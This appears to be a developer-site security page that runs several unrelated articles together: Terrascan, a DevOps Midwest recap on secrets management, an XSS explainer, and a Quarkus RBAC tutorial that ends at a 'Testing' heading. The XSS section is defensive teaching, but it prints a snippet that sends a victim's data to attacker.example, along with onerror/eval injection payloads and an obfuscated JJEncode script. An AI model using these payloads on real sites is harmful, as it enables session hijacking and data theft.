The topic of security covers many different facets within the SDLC. From focusing on secure application design to designing systems to protect computers, data, and networks against potential attacks, it is clear that security should be top of mind for all developers. This Zone provides the latest information on application vulnerabilities, how to incorporate security earlier in your SDLC practices, data governance, and more.
From Kubernetes to Argo to Docker to Terraform, the most influential cloud-native innovations are open source. The high velocity and mass adoption of projects like Kubernetes show that in order to keep pace with innovation, the cloud-native community must come together, share best practices, foster collaboration, and contribute to next-generation technologies.

Open Source and Cloud Native

The Cloud Native Computing Foundation (CNCF), the largest open-source community in the world and the host of international events like KubeCon + CloudNativeCon and CloudNativeSecurityCon, rallies around the idea that open source and democratizing innovation are the best ways to make cloud-native technologies widely available. As a subset of the Linux Foundation, the CNCF brings together thousands of developers and cloud architects around the world to create and maintain hundreds of cloud-native open-source projects. With cloud infrastructure becoming increasingly complex, open-source tools like Terrascan by Tenable can help ensure the code developers write to provision cloud resources is secure and compliant with industry standards. By providing transparency and flexibility, open-source software can help organizations customize their security solutions to meet their unique needs and adapt to changing cyber threats. Many companies are taking advantage of these benefits. According to Open UK's "State of Open: The UK in 2021, Phase Three: The Values of Open" report, which surveyed over 273 respondents, the vast majority (89%) are using open-source software. Let's look at how cloud security might play out using Terrascan by Tenable as an example.

What Is Terrascan by Tenable?

Terrascan by Tenable is a static code analyzer that can detect compliance and security violations across infrastructure as code (IaC) to mitigate risks before provisioning cloud-native infrastructure. You can scan many IaC types, including Azure Resource Manager, Kubernetes, Docker, and Terraform (hence the name "Terrascan"). Because it's a code analyzer, Terrascan can be integrated into many tools in the development pipeline. When integrated, misconfiguration scanning is automated as part of the commit or build process. It can run on a developer's laptop, on a software configuration manager (SCM) (e.g., GitHub), on continuous integration/continuous delivery (CI/CD) servers (e.g., ArgoCD and Jenkins), or in your browser with the Terrascan sandbox. In addition, it has a built-in admission controller for Kubernetes, which helps control new resources created on a cluster. With integration into Kubernetes admission controllers, you can prevent insecure resources from entering your Kubernetes environment.

Terrascan by Tenable in Action: A Case Study

To illustrate the benefits of Terrascan, let's consider a hypothetical scenario based on real-world customer experiences in which a company is migrating its on-premises infrastructure to the cloud. The DevOps team is using Terraform to automate infrastructure provisioning, but the security team is concerned about potential security issues in the company's code and the propagation of misconfigurations at runtime. Because of this, they have to slow down developers and ensure that all IaC is secure through rigorous manual processes.
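In a setup like this, the security team could have developers and CI jobs run Terrascan against the Terraform directory before anything is provisioned. Below is a minimal sketch of such an invocation; the directory path is illustrative, and exact flags can vary between Terrascan releases.

Shell
# Scan Terraform files for policy violations before they are provisioned
terrascan scan --iac-type terraform --iac-dir ./infrastructure

# In CI, emit machine-readable output so the pipeline can act on violations
terrascan scan --iac-type terraform --iac-dir ./infrastructure --output json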
Terrascan scans the company's Terraform code against a set of policies based on industry frameworks, such as the Center for Internet Security (CIS) and the National Institute of Standards and Technology (NIST), and identifies weaknesses in the developers' code that could allow unauthorized access to port 22 (SSH). By discovering the problem in the code, the security team can require the cloud resource to only allow SSH access from a specific subnet's classless inter-domain routing (CIDR) range that complies with their security policies. As a result, developers are able to remediate the issue before it leaves a developer workstation, gets pushed to a git repository, or is provisioned in the cloud. They've saved time and headaches, ensuring that their cloud environment is secure and compliant with industry — and their security team's — standards. Terrascan has more than 500 built-in policies. By integrating Terrascan into CI/CD pipelines, developers ensure their code is scanned for security issues at every stage of development. They're making sure that only secure code makes it into production. In summary, open-source tools like Terrascan are an important part of ensuring security in cloud infrastructure. By standardizing security policies and democratizing access to them, the cloud-native community can work together to identify and mitigate potential risks, ultimately creating a more secure cloud environment for everyone.
If you know anything about St. Louis, it is likely the home of the Gateway Arch, the Cardinals, and St. Louis-style BBQ. But it is also home to a DevOps event that featured some fresh perspectives on scaling, migrating legacy apps to the cloud, and how to think about value when it comes to your applications and environments: DevOps Midwest. The quality of the conversations was notable, as this event drew experts and attendees who were working on interesting enterprise problems of scale, availability, and security. The speakers covered a wide range of DevOps topics, but throughout the day, a couple of themes kept showing up: DevSecOps and secrets management. Here are just a few highlights from this amazing event.

Lessons Learned From Helping Agencies Adopt DevSecOps

In his session "Getting from 'DevSecOps' to DevSecOps: What Has Worked and What Hasn't - Yet," Gene Gotimer shared some of the stories from his life helping multiple US government agencies understand and adopt DevOps.

Show Value From the Start, Don't Wait for Them to 'Get It'

While he worked for DISA, the Defense Information Systems Agency, he helped them evaluate how to go from manual releases to a more automated approach. The challenge he faced was getting them to see the value of CI/CD. He focused on adding automated testing earlier in their process, which is at the heart of the DevSecOps 'shift left' strategy. He met unexpected resistance as the teams failed to 'just get it' and see the long-term benefits of the new approach, mainly due to their lack of familiarity with testing best practices, which led to implementation decisions that made testing cycles longer overall. His biggest takeaway from the experience was realizing the established team was not going to have an 'aha' moment where they just collectively see the value. Value needs to be clearly defined in the goals of a project. Ultimately, you need to show that the new path is not just 'good' but is overall better, stated in terms the existing team understands.

Never Let a Crisis Go to Waste: Be Ready

In another engagement, this time with the TSA, the Transportation Security Administration, he built a highly secure DevOps pipeline based on Chef that was capable of automatically updating dependencies on hundreds of systems. After a year of work, he was limited to only showing demos of his tools, and he was restricted to a sandbox. The fear of a new approach and the reluctance to change meant he was able to roll out the new tooling only when it was a last resort. An emergency meant doing updates the old way could not meet a deadline that was driven by a new vulnerability, so they gave his new tooling a chance. After all the systems were successfully updated in a few short hours, the department lead was joyous that the 'last year of work meant they could update so fast.' But the reality is it took them a year to hit a crisis point that forced the change. The tool had been ready for months. It was only after the whole team saw the new approach in action that resistance disappeared. The larger lesson he took away from this was that being ready paid off. If they had come to him and he had not been ready to meet the moment, then the team would have never experienced the benefits of an automated approach.

Carrots Not Sticks

The final story Gene shared was about his time working for ICE, U.S. Immigration and Customs Enforcement. While there, he worked to improve their security in AWS GovCloud.
While the team was practicing DevOps, they had over 150 security issues in their build process, which took over 20 minutes to complete. He and his team worked to lower those security issues to less than twenty overall while tuning the whole process to take around six minutes. Unfortunately, the new system was not approved or adopted for many months. Gene's security team had been trying to sell the security benefits, which never took priority for the DevOps team. While there was administrative buy-in, the new process was not adopted until, finally, a different, smaller team realized the new process was 3x faster than their approach. They saw security as a side benefit. In the end, as other teams started adopting the faster process, the overall security was improved. Gene stressed that they could have gone to the CIO and demanded that the new approach be used for security reasons, but knew that would mean even more resistance overall. What ended up working was showing that the new way was ultimately better, easier, and faster. Gene ended his talk by reminding us always to continue building interesting things and to keep learning and innovating. He left us with a quote from Andrew Clay Shafer, a pioneer in DevOps: "You’re either building a learning organization, or you are losing to someone who is." Secrets Management in DevOps Three different talks at DevOps Midwest dealt with secret security in DevOps explicitly. Two talks discussed security in the context of the migration of applications to the cloud, and one talked about the problems of secrets in code and how git can help keep you safe. Picking a (Safe) Cloud Migration Strategy In his talk "You're Not Just the Apps Guy Anymore; Embracing Cloud DevOps," John Richards of Paladin Cloud covered why moving to the cloud matters as well as the challenges and unique opportunities that migrating to the cloud brings. He laid out three migration strategies. 1. Lift and shift 2. Re-architecture 3. Rebuild with cloud-native tools In "lift and shift," you simply take the existing application and drop it into a cloud environment. This can bring the ability to scale on demand, but it also means you are not reaping the full benefits of the cloud. While this is the fastest and least costly method, you still need to spend time figuring out how to "connect the plumbing." Part of that plumbing is figuring out how to call for secrets in the cloud. Most likely, while the application lived on an on-prem server, the secrets were previously stored on the same machine. Setting and leveraging the built-in environment variables in the cloud is a good short-term step for teams crunched for time. He lays out better secret management approaches in the other migration paths. In a re-architecture, you start with a 'lift and shift' migration and slowly build onto it, changing the application slowly over time to take advantage of the scale and performance gains the cloud offers. This is a flexible path but requires a higher overall investment, but if done correctly, the team can maximize value while building for the future. This is a good time for more robust secrets management to be adopted, especially as more third-party services need authentication and authorization. Tools like Vault or the built-in cloud services can be rolled out as the application evolves. The third path is completely rebuilding the application with cloud-native tools. This is the most expensive migration path but brings the greatest benefits. 
This approach allows you to innovate, taking advantage of edge computing and technology that was simply not available when the legacy application was first created. This also means adopting new secret management tools immediately and across the whole team at once. This approach definitely requires the highest level of buy-in from all teams involved. John also talked about shared cloud responsibility. For teams used to controlling and locking down on-premises servers, it is going to be an adjustment to partner with the cloud providers to defend your applications. Living in a world of dynamic attack surfaces makes defense-in-depth a necessity, not a nice to have; secrets detection and vulnerability scanning are mandatory parts of this approach. Your cloud provider can only protect you so much… misconfiguration or leaving your keys out in the open will lead to bad things.

How To Migrate to the Cloud Safely

While John's talk took a high-level approach to possible migration paths, Andrew Kirkpatrick from StackAdapt gave us a very granular view of how to actually perform a migration in his session "Containerizing Legacy Apps with Dynamic File-Based Configurations and Secrets." Andrew walked us through the process of taking an old PHP-based BBS running on a single legacy server and moving it to containers, making it highly scalable and highly available in the process. He also managed to make it more secure along the way. He argued that every company has some legacy code that is still running in production and that someone has to maintain it, but nobody wants to touch it. The older the code, the higher the likelihood that patches will introduce new bugs. Andrew said that the sooner you move it to containers and the cloud, the better off everyone is going to be and the more value you can extract from that application. While the lift and shift approach might not seem like the best use of advanced tools like Docker Swarm or Helm, in all reality, "you can use fancy new tech to run terrible, ancient software, and the tech doesn't care." He warned that most tutorials out there make some assumptions you have to take into account. While they might get you to a containerized app, most tutorials do not factor in scale or security concerns. For example, if a tutorial just says to download an image, it does not tell you to make sure there are no open issues with the image on Docker Hub. If you downloaded the Alpine Linux Docker image in the three years that the unlocked root account issue went unfixed, your tutorial did not likely account for that. Once he got the BBS software running in a new container, he addressed the need to connect it to the legacy DB. He laid out a few paths for possibly managing the needed credentials, but the safest by far would be to use a secrets manager like HashiCorp Vault or Doppler. He also suggested a novel approach for leveraging these types of tools: storing configuration values. While secrets managers are designed to safely store credentials and give you a way to programmatically call them, to the tool those keys are all just arbitrary strings. There is no reason you could not store settings values alongside your secrets and programmatically call them when you are building a container.

Leveraging Git to Keep Your Secrets Secret

The final talk that mentioned keeping your secrets out of source code was presented by me, the author of this article.
I was extremely happy to be part of the event and present an extended version of my talk, "Stop Committing Your Secrets - Git Hooks To The Rescue!" In this session, I laid out some of the findings of the State of Secrets Sprawl report: 10M secrets found exposed in 2022 in public GitHub repositories. That is a more than 67% increase compared to the six million found in 2021. On average, 5.5 commits out of 1,000 exposed at least one secret. That is a more than 50% increase compared to 2021. At the heart of this research is git, the most widely used version control system on earth and the de facto transportation mechanism for modern DevOps. In a perfect world, we would all be using secret managers throughout our work, as well as built-in tools like `.gitignore` to keep our credentials out of our tracked code histories. But even in organizations where those tools and workflows are in place, human error still happens. What we need is some sort of automation to stop us from making a git commit if a secret has been left in our code. Fortunately, git gives us a way to do this on every attempt to commit with git hooks. Any script stored in the git hooks folder that is also named exactly the same as one of the 17 available git hooks will get fired off by git when that git event is triggered. For example, a script called `pre-commit` will execute when `git commit` is called from the terminal. GitGuardian makes it very easy to enable the pre-commit check you want, thanks to ggshield. In just three quick commands, you can install, authenticate the tool, and set up the needed git hook at a global level, meaning all your local repositories will run the same pre-commit check.

Shell
$ pip install ggshield
$ ggshield auth login
$ ggshield install --mode global

This free CLI tool can also be used to scan your repositories whenever you want; no need to wait for your next commit. After setting up your pre-commit hook, each time you run `git commit`, GitGuardian will scan the index and, if a secret is found, stop the commit, tell you exactly where the secret is and what kind of secret is involved, and give you some helpful tips on remediation.

DevSecOps Is a Global Community: Including the Midwest

While many of the participants at DevOps Midwest were, predictably, from the St. Louis area, everyone at the event is part of a larger global community. A community that is not defined by geographic boundaries but is instead united by a common vision. DevOps believes that we can make a better world by embracing continuous feedback loops to improve collaboration between teams and users. We believe that if repetitive and time-consuming tasks can be automated, they should be automated. We believe that high availability and scalability go hand-in-hand with improved security. No matter what approach you take to migrate to the cloud or what specific platforms and tools you end up selecting, keeping your secrets safe should be a priority. Using a service like GitGuardian can help you understand the state of your own secrets sprawl on legacy applications as you are preparing to move, thanks to historical scanning, and keep you safe as the application runs in its new home, thanks to real-time scanning. And with ggshield, you can keep those secrets that do slip into your work out of your shared repos.
What Is Cross-Site Scripting?

Cross-Site Scripting (XSS) is a code-injection vulnerability that occurs in applications that process HTML when developers do not sanitize user input well enough before inserting it into an HTML template. It allows an attacker to insert arbitrary JavaScript code into a template and execute it in the user's context. In the image above, the developer failed to sanitize the content of the "last-name" div, which resulted in users being able to include malicious scripts by manipulating their last name.

Is XSS Common?

Despite the fact that numerous frameworks and libraries provide users with all the necessary tools to get rid of XSS, this is still one of the most common vulnerabilities found in web applications. It consistently appears in the OWASP list of the Top Web Application Security Risks and was used in 40% of online cyberattacks against large enterprises in Europe and North America in 2019. According to HackerOne, XSS vulnerabilities are the most common vulnerability type discovered in bug bounty programs.

Where Can I Spot an XSS Vulnerability?

There are two types of Cross-Site Scripting: Client-Side XSS and Server-Side XSS.
Client-Side XSS: The most common kind of XSS. It happens on the client side (in browsers or desktop apps) and is a consequence of not properly sanitizing user-supplied data before inserting it into the DOM.
Server-Side XSS: This is quite rare, however possible. It happens when the server transforms HTML files into other documents (most likely, PDFs), and the library does not whitelist what kind of code it executes. You can read about the Dynamic PDF vulnerability on HackTricks.

Is XSS Really That Dangerous?

Simply put, it's a disaster. Here's a list of what an attacker can do if they're able to exploit an XSS vulnerability on the client side:
Remote Code Execution (browser exploits, CMS exploitation)
Session Hijacking
Bypassing CSRF protection
Keylogging
Forced Downloads
Man-in-the-Middle Attacks
All sorts of phishing: credential harvesting, ad-jacking (ad injection), clickjacking, redirecting users to a malicious website, etc.
Stealing data from local, session, and web storage, cookies, IndexedDB, and page source code; taking screenshots
DoS and DDoS
Content Spoofing
Pivoting into hidden, internal networks protected by firewalls: JS can be used for host and port discovery, service identification, and interaction (this is extremely slow)
Stealing geolocation, capturing audio, web camera, or gyroscope data (requires explicit permission)
Crypto mining (hard; the browser will try to protect the user)

Server-Side XSS is even worse because it allows:
Remote Code Execution
Local File Inclusion
Server-Side Request Forgery
Internal Path Disclosure
Stealing information from the result document
DoS
Crypto mining

The attacker is also able to get information and control the tab in real-time mode.

Misconceptions About XSS

"XSS Is Not a Threat if the Website Uses HTTP-Only Cookies for Authentication"

I hear that a lot, and that's just ridiculous. Yes, an attacker can't steal HTTP-only cookies with JavaScript; however, they don't even need to. The true danger of XSS comes from the ability to execute arbitrary JS in the current user's context. If an attacker can't steal the cookie and attach it to malicious requests made from their machine, they'll just move the malware into the victim's browser, and the browser will attach the cookies for them. I admit the exploitation becomes more complicated; however, it's A LOT stealthier and safer for the attacker.
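To make that last point concrete, here is a rough sketch of what injected script can do from inside the victim's session; the endpoint and payload are hypothetical, and the browser attaches the session cookies (HTTP-only included) on its own:

JavaScript
// Injected script running in the victim's browser: the browser automatically
// attaches the session cookies (HTTP-only or not) to this same-origin request.
fetch('/api/account/transfer', {                 // hypothetical endpoint
  method: 'POST',
  credentials: 'include',                        // send cookies with the request
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ to: 'attacker', amount: 1000 })
})
  .then(res => res.text())
  .then(data => {
    // Exfiltrate whatever the response contains to an attacker-controlled host
    new Image().src = 'https://attacker.example/log?d=' + encodeURIComponent(data);
  });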
"XSS Is a Non-Persistent Type of Attack #1: I Leave the Vulnerable Page, and It's Fine"

Wrong again! Once an attacker can inject arbitrary JS into your browser, they can change the application's behavior so that you NEVER leave the vulnerable page. By manipulating requests/responses and the HTML DOM, they can make it seem like you left the page by re-rendering new content on the vulnerable page. However, this kind of trickery can be defeated if the user manually types the URL they're interested in into the address bar.

"XSS Is a Non-Persistent Type of Attack #2: I Just Leave the Website, and It's Fine"

That is not true: malicious JavaScript files CAN be persisted in your browser. That's rare but still possible via Service Workers. To register a malicious service worker, one of the following conditions must be met:
An attacker has write access to the frontend server
There's an unfiltered JSONP endpoint exposed

If an attacker manages to register a malicious Service Worker, they can maintain persistence in your browser indefinitely. Service Workers can be used to sniff and modify traffic (for instance, to supply new malicious scripts with each response). Check out the ShadowWorkers project for more details.

How Many Types of XSS Are There?

There are several different ways XSS can manifest. Security specialists usually single out three.
DOM-Based XSS. DOM XSS stands for Document Object Model-based Cross-site Scripting. A DOM-based XSS attack is possible if the web application writes data to the Document Object Model without proper sanitizing. The attacker can manipulate this data to include malware on the web page. Key points: Generally, DOM-Based cross-site scripting attacks are client-side attacks. Malicious code might never reach the server. Malware is executed AFTER the HTML template is rendered; it happens at some point during runtime.
Reflected XSS. Reflected XSS occurs when the server takes a part of a request and inserts it into the response without proper sanitizing. Key points: A Reflected XSS payload ALWAYS reaches the server; it is part of both request and response. Unlike DOM-Based XSS, a Reflected XSS payload is executed WHILE a browser renders an HTML template since the payload is part of the response and usually is embedded into the template.
Stored XSS. Stored XSS happens when developers blindly trust data that's being stored in their databases, web caches, files, etc. Key points: Stored XSS is saved somewhere (not necessarily the database) for a while. The payload might be executed on multiple pages and usually does not require any user interaction to fire (unlike DOM-Based and Reflected XSS, which are usually spread via malicious links and require user interaction).

If I Use React, Am I Safe Then?

Surprise reveal: React is not fully safe from XSS, although it really tries to protect users from it. There are several ways to inject malicious JS into a React app. React does not filter what you're passing to props:
href (exploitation via "javascript:" or "data:text/html" URI)
src (exploitation via "javascript:" or "data:text/html" URI)
srcDoc (exploitation via inserting malicious HTML)
formAction (exploitation via "eval(...arbitrary js)")
data (exploitation via "javascript:" or "data:text/html" URI)

React also allows you to directly manipulate the DOM, bypassing its restrictions and protections. You can achieve this by using the dangerouslySetInnerHTML prop. As a security precaution, React ignores <script> tags whenever they're inserted into dangerouslySetInnerHTML.
This protection can be easily bypassed by modifying the XSS payload, for example by using <iframe src="javascript:eval(...)"/> or <img id='_malware_' src='x' onerror='eval(this.id)' />. Such mutations allow you to inject <script> tags into the DOM. The last known way to inject malicious code into a React app is by abusing the user-controlled props object. If an attacker has control over the props object's keys, they might be able to embed an exploit by either abusing the href, src, srcDoc, data, or formAction attributes, or by poisoning props with dangerouslySetInnerHTML. This is especially dangerous if users have control over the JSX tag that's being inserted into the React tree.

How Can I Prevent XSS?

The first step would be to encode data on output. According to the PortSwigger Web Security Academy, encoding should be applied directly before user-controllable data is written to a page because the context you're writing into determines what kind of encoding you need to use. For example, values inside a JavaScript string require a different type of escaping from those in an HTML context. In an HTML context, you should convert non-whitelisted values into HTML entities:
< converts to: &lt;
> converts to: &gt;
In a JavaScript string context, non-alphanumeric values should be Unicode-escaped:
< converts to: \u003c
> converts to: \u003e

Validate Input on Arrival

You should validate any user input as strictly as possible. For instance:
If a user submits a URL, manually cast it to a URL class and verify that it starts with a safe protocol (HTTP / HTTPS)
If a user supplies a value that is expected to be numeric, explicitly cast it to a number
Validate that input contains only an expected set of characters

Whitelisting and Blacklisting

Input validation should generally employ whitelists rather than blacklists. For example, instead of trying to make a list of all harmful protocols (javascript, data, etc.), simply make a list of safe protocols (HTTP, HTTPS) and disallow anything not on the list.

Allowing "Safe" HTML

The best option is to use a JavaScript library that performs filtering and encoding in the user's browser, such as DOMPurify. Other libraries allow users to provide content in markdown format and convert the markdown into HTML. Unfortunately, all these libraries have XSS vulnerabilities from time to time, so this is not a perfect solution. If you do use one, you should monitor closely for security updates. If you're using a frontend framework, your other option is to parse it into that framework's elements, like in the JSX tree in React. There are libraries that do that; however, parsing it manually is not that hard, so if you know exactly what kind of HTML you're supposed to render, it might be safer to do it yourself. That way, you'll definitely avoid dangerous props, event handlers, and harmful CSS.

Mitigating XSS Using Content Security Policy (CSP)

CSP is the last line of defense against cross-site scripting. If your XSS prevention fails, you can use CSP to mitigate XSS by restricting what an attacker can do. CSP lets you control various things, such as whether external scripts can be loaded and whether inline scripts will be executed. To deploy CSP, you need to include an HTTP response header called Content-Security-Policy with a value containing your policy. An example of CSP is as follows:
default-src 'self'; script-src 'self'; object-src 'none'; frame-src 'none'; base-uri 'none';
This policy specifies that resources such as images and scripts can only be loaded from the same origin as the main page.
So even if an attacker can successfully inject an XSS payload, they can only load resources from the current origin. If you require the loading of external resources, ensure you only allow scripts that do not aid an attacker in exploiting your site. For example, if you whitelist certain domains, then an attacker can load any script from those domains. Where possible, try to host resources on your own domain. If that is not possible, then you can use a hash- or nonce-based policy to allow scripts on different domains. A nonce is a random string that is added as an attribute of a script or resource, which will only be executed if the random string matches the server-generated one. An attacker is unable to guess the randomized string and, therefore, cannot invoke a script or resource with a valid nonce, so the resource will not be executed. Server-Side Protection Using server-side protection, such as Web-Application Firewalls and Intrusion Prevention Systems, can help you reject XSS payloads sent to your server. For instance, AWS WAF and Snort IPS have sets of rules that detect the most common XSS payloads, such as ‘<script>alert(1)</script>’. Additionally, IPS systems ship with known exploit traffic signatures; for example, Snort is able to detect and disrupt exploitation of CVE-2011-1897 — XSS vulnerability in Microsoft Forefront Unified Access Gateway. Beware of Inserting User Input Into the “Script” Tag If an attacker is able to insert JS where it’s being evaluated, there's not much you can do. There are numerous ways to encode and mutate malicious scripts by using dedicated obfuscators or esoteric JS dialects, like Katakana, JJEncode, or JSFuck. Consider the following JJEncode snippet: JavaScript ```js $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"") [$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$ $_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$. $_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($. $=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+ (!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$. $_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.__$+")"+"\"") ())(); ``` When inserted in a <script> tag, it evaluates to alert(1). A home-baked regular expression can’t help because there’s not a single suspicious word or a control character in here.
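This is one more reason to lean on a vetted sanitizer such as DOMPurify (mentioned in the prevention section above) instead of home-grown filtering. Below is a minimal sketch of sanitizing untrusted HTML before it touches the DOM; the allowed tags and the element selector are illustrative, and the library is assumed to be installed from npm:

JavaScript
import DOMPurify from 'dompurify'; // npm install dompurify

// Untrusted markup, e.g., a comment body supplied by a user
const dirty = '<p>Hello <img src="x" onerror="alert(1)"></p>';

// Whitelist a small set of tags and attributes; everything else is stripped
const clean = DOMPurify.sanitize(dirty, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p'],
  ALLOWED_ATTR: ['href']
});

// Only the sanitized markup is ever inserted into the page
document.querySelector('#comment').innerHTML = clean;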
REST APIs are the heart of any modern software application. Securing access to REST APIs is critical for preventing unauthorized actions and protecting sensitive data. Additionally, companies must comply with regulations and standards to operate successfully. This article describes how we can protect REST APIs using Role-based access control (RBAC) in the Quarkus Java framework. Quarkus is an open-source, full-stack Java framework designed for building cloud-native, containerized applications. The Quarkus Java framework comes with native support for RBAC, which will be the initial focus of this article. Additionally, the article will cover building a custom solution to secure REST endpoints. Concepts Authentication: Authentication is the process of validating a user's identity and typically involves utilizing a username and password. (However, other approaches, such as biometric and two-factor authentication, can also be employed). Authentication is a critical element of security and is vital for protecting systems and resources against unauthorized access. Authorization: Authorization is the process of verifying if a user has the necessary privileges to access a particular resource or execute an action. Usually, authorization follows authentication. Several methods, such as role-based access control and attribute-based access control, can be employed to implement authorization. Role-Based Access Control: Role-based access control (RBAC) is a security model that grants users access to resources based on the roles assigned to them. In RBAC, users are assigned to specific roles, and each role is given permissions that are necessary to perform their job functions. Gateway: In a conventional software setup, the gateway is responsible for authenticating the client and validating whether the client has the necessary permissions to access the resource. Gateway authentication plays a critical role in securing microservices-based architectures, as it allows organizations to implement centralized authentication. Token-based authentication: This is a technique where the gateway provides an access token to the client following successful authentication. The client then presents the access token to the gateway with each subsequent request. JWT: JSON Web Token (JWT) is a widely accepted standard for securely transmitting information between parties in the form of a JSON object. On successful login, the gateway generates a JWT and sends it back to the client. The client then includes the JWT in the header of each subsequent request to the server. The JWT can include required permissions that can be used to allow or deny access to APIs based on the user's authorization level. Example Application Consider a simple application that includes REST APIs for creating and retrieving tasks. The application has two user roles: Admin — allowed to read and write. Member — allowed to read-only. Admin and Member can access the GET API; however, only Admins are authorized to use the POST API. Java @Path("/task") public class TaskResource { @GET @Produces(MediaType.TEXT_PLAIN) public String getTask() { return "Task Data"; } @POST @Produces(MediaType.TEXT_PLAIN) public String createTask() { return "Valid Task received"; } } Configure Quarkus Security Modules In order to process and verify incoming JWTs in Quarkus, the following JWT security modules need to be included. 
For a Maven-based project, add the following to pom.xml:

XML
<dependency>
    <groupId>io.quarkus</groupId>
    <artifactId>quarkus-smallrye-jwt</artifactId>
</dependency>
<dependency>
    <groupId>io.quarkus</groupId>
    <artifactId>quarkus-smallrye-jwt-build</artifactId>
</dependency>
<dependency>
    <groupId>io.quarkus</groupId>
    <artifactId>quarkus-test-security-jwt</artifactId>
    <scope>test</scope>
</dependency>

For a Gradle-based project, add the following:

Groovy
implementation("io.quarkus:quarkus-smallrye-jwt")
implementation("io.quarkus:quarkus-smallrye-jwt-build")
testImplementation("io.quarkus:quarkus-test-security-jwt")

Implementing RBAC

Quarkus provides built-in RBAC support to protect REST APIs based on user roles. This can be done in a few steps.

Step 1

The first step in utilizing Quarkus' built-in RBAC support is to annotate the APIs with the roles that are allowed to access them. The annotation to be added is @RolesAllowed, which is a JSR 250 security annotation that indicates that the given endpoint is accessible only if the user belongs to the specified role.

Java
@GET
@RolesAllowed({"Admin", "Member"})
@Produces(MediaType.TEXT_PLAIN)
public String getTask() {
    return "Task Data";
}

@POST
@RolesAllowed({"Admin"})
@Produces(MediaType.TEXT_PLAIN)
public String createTask() {
    return "Valid Task received";
}

Step 2

The next step is to configure the issuer URL and the public key. This enables Quarkus to verify the JWT and ensure it has not been tampered with. This can be done by adding the following properties to the application.properties file located in the /resources folder.

Properties files
mp.jwt.verify.publickey.location=publicKey.pem
mp.jwt.verify.issuer=https://myapp.com/issuer
quarkus.native.resources.includes=publicKey.pem

mp.jwt.verify.publickey.location - This configuration specifies the location of the public key to Quarkus, which must be located in the classpath. The default location Quarkus looks for is the /resources folder.
mp.jwt.verify.issuer - This property represents the issuer of the token, who created it and signed it with their private key.
quarkus.native.resources.includes - This property informs Quarkus to include the public key as a resource in the native executable.

Step 3

The last step is to add your public key to the application. Create a file named publicKey.pem and save the public key in it. Copy the file to the /resources folder located in the /src directory.

Testing

Quarkus offers robust support for unit testing to ensure code quality, particularly when it comes to RBAC. Using the @TestSecurity annotation, user roles can be defined, and a JWT can be generated to call REST APIs from within unit tests.

Java
@Test
@TestSecurity(user = "testUser", roles = "Admin")
public void testTaskPostEndpoint() {
    given().log().all()
        .body("{id: task1}")
        .when().post("/task")
        .then()
        .statusCode(200)
        .body(is("Valid Task received"));
}

Custom RBAC Implementation

As the application grows and incorporates additional features, the built-in RBAC support may become insufficient. A well-written application allows users to create custom roles with specific permissions associated with them. It is important to decouple roles and permissions and avoid hardcoding them in the code. A role can be considered as a collection of permissions, and each API can be labeled with the required permissions to access it. To decouple roles and permissions and provide flexibility to users, let's expand our example application to include two permissions for tasks.
task:read — permission would allow users to read tasks.
task:write — permission would allow users to create or modify tasks.

We can then associate these permissions with the two roles, "Admin" and "Member":
Admin: assigned both read and write. ["task:read", "task:write"]
Member: would only have read. ["task:read"]

Step 1

To associate each API with a permission, we need a custom annotation that simplifies its usage and application. Let's create a new annotation called @Permissions, which accepts an array of permission strings that the user must have in order to call the API.

Java
@Target({ ElementType.METHOD })
@Retention(RetentionPolicy.RUNTIME)
public @interface Permissions {
    String[] value();
}

Step 2

The @Permissions annotation can be added to the task APIs to specify the required permissions for accessing them. The GET task API can be accessed if the user has either task:read or task:write permissions, while the POST task API can only be accessed if the user has the task:write permission.

Java
@GET
@Permissions({"task:read", "task:write"})
@Produces(MediaType.TEXT_PLAIN)
public String getTask() {
    return "Task Data";
}

@POST
@Permissions("task:write")
@Produces(MediaType.TEXT_PLAIN)
public String createTask() {
    return "Valid Task received";
}

Step 3

The last step involves adding a filter that intercepts API requests and verifies if the included JWT has the necessary permissions to call the REST API. The JWT must include the userId as part of the claims, which is the case in a typical application since some form of user identification is included in the JWT token. The Reflection API is used to determine the invoked method and its associated annotation. In the provided code, the user -> role mapping and role -> permissions mapping are stored in HashMaps. In a real-world scenario, this information would be retrieved from a database and cached to allow for faster access.
Java
@Provider
public class PermissionFilter implements ContainerRequestFilter {

    @Context
    ResourceInfo resourceInfo;

    @Inject
    JsonWebToken jwt;

    @Override
    public void filter(ContainerRequestContext requestContext) throws IOException {
        Method method = resourceInfo.getResourceMethod();
        Permissions methodPermAnnotation = method.getAnnotation(Permissions.class);

        if (methodPermAnnotation != null && checkAccess(methodPermAnnotation)) {
            System.out.println("Verified permissions");
        } else {
            requestContext.abortWith(Response.status(Response.Status.FORBIDDEN).build());
        }
    }

    /**
     * Verify if JWT permissions match the API permissions
     */
    private boolean checkAccess(Permissions perm) {
        boolean verified = false;
        if (perm == null) {
            // If there is no permission annotation, verification fails
            verified = false;
        } else if (jwt.getClaim("userId") == null) {
            // Don't support anonymous users
            verified = false;
        } else {
            String userId = jwt.getClaim("userId");
            String role = getRolesForUser(userId);
            String[] userPermissions = getPermissionForRole(role);
            if (Arrays.asList(userPermissions).stream()
                    .anyMatch(userPerm -> Arrays.asList(perm.value()).contains(userPerm))) {
                verified = true;
            }
        }
        return verified;
    }

    // role -> permission mapping
    private String[] getPermissionForRole(String role) {
        Map<String, String[]> rolePermissionMap = new HashMap<>();
        rolePermissionMap.put("Admin", new String[] {"task:write", "task:read"});
        rolePermissionMap.put("Member", new String[] {"task:read"});
        return rolePermissionMap.get(role);
    }

    // userId -> role mapping
    private String getRolesForUser(String userId) {
        Map<String, String> userMap = new HashMap<>();
        userMap.put("1234", "Admin");
        userMap.put("6789", "Member");
        return userMap.get(userId);
    }
}

Testing

